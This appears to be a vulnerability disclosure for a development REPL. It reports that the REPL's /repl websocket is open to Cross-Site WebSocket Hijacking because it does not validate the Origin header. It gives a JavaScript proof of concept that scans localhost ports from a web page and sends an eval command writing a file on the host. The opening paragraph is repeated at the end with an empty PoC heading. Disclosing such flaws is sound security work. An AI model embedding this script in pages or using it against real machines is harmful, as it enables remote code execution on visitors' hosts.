The websocket at /repl does not seem to be protected against CSRF (or Cross-Site WebSocket Hijacking, CSWSH, as it is often called for WebSockets). Because browsers do not apply the same-origin policy to WebSocket handshakes, the server itself has to validate the `Origin` header (or require a token) before accepting the upgrade; without that check, a malicious website can execute arbitrary code on the host.
PoC:
// Candidate port list, 10000..65534; spawn() below consumes it from the end.
var ports = [];
// Set once a handshake has been accepted so that no further connections are tried.
var done = false;
for (var i = 10000; i < 65535; i++) {
ports.push(i);
}
// Probes one port at a time: a failed handshake (onerror) moves on to the
// next port, a successful one sends a single "eval" op over the socket.
// Nothing on the client side limits this to the page's own origin, which is
// why the /repl endpoint has to validate the Origin header of the upgrade
// request (or require a secret token) before accepting the connection.
function spawn() {
if (done || ports.length < 1)
return;
var port = ports.pop();
var ws = new WebSocket("ws://localhost:" + port + "/repl");
// A refused or failed connection simply retries with the next port.
ws.onerror = spawn;
ws.onopen = function() {
done = true;
console.log("Connected");
ws.send(JSON.stringify({"op": "eval", "code": "(spit \"/tmp/file\" \"evil!\")" }))
}
}
// Starts up to 200 probes in parallel; each one chains to the next port via
// its onerror handler until a handshake is accepted or the list runs out.
for (var i = 0; i < 200; i++) {
spawn();
}
The websocket at /repl does not seem to be protected against CSRF (or Cross-Site WebSocket Hijacking, CSWSH, as it is often called for WebSockets). This allows a malicious website to execute arbitrary code on the host.
PoC: